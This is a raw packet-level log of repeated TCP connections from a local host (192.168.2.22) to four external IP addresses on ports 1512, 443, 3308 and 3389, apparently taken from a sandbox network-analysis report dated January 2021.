Jan 12, 2021 07:44:36.497731924 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.550827026 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.550890923 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.551786900 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.604597092 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.611462116 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.611480951 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.611556053 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.621232033 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.675299883 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.675471067 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.682435036 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.682629108 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.735335112 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.735466003 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.773581028 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.788374901 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.788402081 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.889417887 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.889446020 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:36.889740944 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.895571947 CET	49283	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:36.948462009 CET	1512	49283	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:37.013370991 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.065546989 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.065610886 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.066409111 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.118360996 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.133029938 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.133097887 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.141485929 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.195936918 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.196225882 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.202986002 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.203155041 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.255219936 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.255430937 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.294857025 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.307723045 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.426119089 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.426145077 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.426373959 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.432152033 CET	49284	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:37.484261990 CET	443	49284	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:37.547394037 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.590672970 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.590802908 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.592395067 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.635440111 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.647352934 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.647373915 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.647526026 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.665882111 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.710782051 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.711179018 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.721024036 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.721267939 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.764446020 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.764719009 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.805228949 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.807813883 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.807831049 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.919692993 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.919723988 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:37.920106888 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.925698996 CET	49285	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:37.968782902 CET	3308	49285	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:38.054601908 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.109030962 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.109214067 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.110843897 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.165193081 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.191267967 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.191297054 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.191365957 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.205378056 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.266318083 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.266398907 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.275850058 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.276065111 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.330410957 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.330729961 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.369867086 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.385330915 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.385354042 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.477791071 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.477811098 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.477967024 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.478017092 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.483511925 CET	49286	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:38.537751913 CET	3389	49286	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:38.593492031 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.646574020 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.646684885 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.648602009 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.701679945 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.708515882 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.708542109 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.708640099 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.718099117 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.772629023 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.772710085 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.776468992 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.776616096 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.829651117 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.829737902 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.865927935 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.882819891 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.882838964 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.983334064 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.983367920 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:38.983750105 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:38.989444017 CET	49287	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:39.042520046 CET	1512	49287	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:39.107584953 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.159478903 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.159579039 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.161217928 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.212831020 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.227730989 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.227828979 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.244446993 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.297447920 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.297770977 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.307733059 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.307941914 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.360286951 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.360610962 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.399035931 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.412667036 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.412717104 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.530915976 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.530987978 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.531250000 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.533896923 CET	49288	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:39.585702896 CET	443	49288	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:39.660645962 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.703912973 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.704015970 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.705498934 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.748543024 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.759376049 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.759409904 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.759572983 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.773979902 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.819292068 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.819396019 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.829994917 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.830349922 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.873600960 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.873826027 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:39.913969040 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.917299986 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:39.917339087 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:40.030335903 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:40.030376911 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:40.030601025 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:40.036309958 CET	49289	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:40.079571009 CET	3308	49289	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:40.153269053 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.208053112 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.208152056 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.209702015 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.264496088 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.283765078 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.283786058 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.283879995 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.296070099 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.365303040 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.365448952 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.372462988 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.372642994 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.426987886 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.427184105 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.466861963 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.481544971 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.481563091 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.571274042 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.571326017 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.571547031 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.576483965 CET	49290	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:40.631000996 CET	3389	49290	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:40.699110031 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.752115011 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:40.752291918 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.754100084 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.806829929 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:40.813539028 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:40.813555002 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:40.813699961 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.829014063 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.882894039 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:40.883053064 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.889919043 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.890075922 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.942903042 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:40.943264008 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:40.996057987 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:41.096786976 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:41.096806049 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:41.096856117 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:41.096883059 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:41.098959923 CET	49291	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:41.151690960 CET	1512	49291	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:41.214401960 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.266755104 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.266855955 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.268656969 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.320740938 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.335612059 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.335719109 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.345788956 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.400391102 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.400521040 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.410980940 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.411148071 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.463418007 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.463684082 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.515873909 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.634103060 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.634141922 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.634351015 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.640089035 CET	49292	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:41.692101955 CET	443	49292	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:41.760602951 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.803802967 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:41.803898096 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.805509090 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.848495960 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:41.859009027 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:41.859025955 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:41.859162092 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.875958920 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.920835972 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:41.920965910 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.931190014 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.931582928 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:41.975372076 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:41.975464106 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:42.015043020 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:42.018465042 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:42.018651009 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:42.131105900 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:42.131129980 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:42.131278992 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:42.136944056 CET	49293	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:42.179857016 CET	3308	49293	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:42.258841038 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.312638998 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.312721014 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.313997030 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.367778063 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.383116961 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.383132935 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.383199930 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.392271042 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.452291965 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.452424049 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.457634926 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.457772017 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.511991978 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.512186050 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.551711082 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.566389084 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.566401005 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.655296087 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.655309916 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.655458927 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.658534050 CET	49294	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:42.712306023 CET	3389	49294	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:42.770201921 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.823120117 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:42.823190928 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.823991060 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.876887083 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:42.883613110 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:42.883636951 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:42.883704901 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.900762081 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.955209970 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:42.955460072 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.964462042 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:42.964693069 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:43.017842054 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.018132925 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:43.053965092 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.071305037 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.071347952 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.169573069 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.169626951 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.169845104 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:43.176034927 CET	49295	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:43.229243994 CET	1512	49295	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:43.289414883 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.341587067 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.341672897 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.342820883 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.394753933 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.409327030 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.409415007 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.429522991 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.484967947 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.485045910 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.488801003 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.488893032 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.540810108 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.540926933 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.579545021 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.595412016 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.595457077 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.711579084 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.711642027 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.711873055 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.717979908 CET	49296	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:43.770657063 CET	443	49296	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:43.835292101 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:43.878611088 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:43.878828049 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:43.880331039 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:43.923455954 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:43.939408064 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:43.939461946 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:43.939687014 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:43.956666946 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.001688957 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.001974106 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.011574984 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.011874914 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.055236101 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.055387020 CET	49297	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:44.095351934 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.098685026 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.098723888 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.211477041 CET	3308	49297	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:44.211528063 CET	3308	49297	80.86.91.27	192.168.2.22
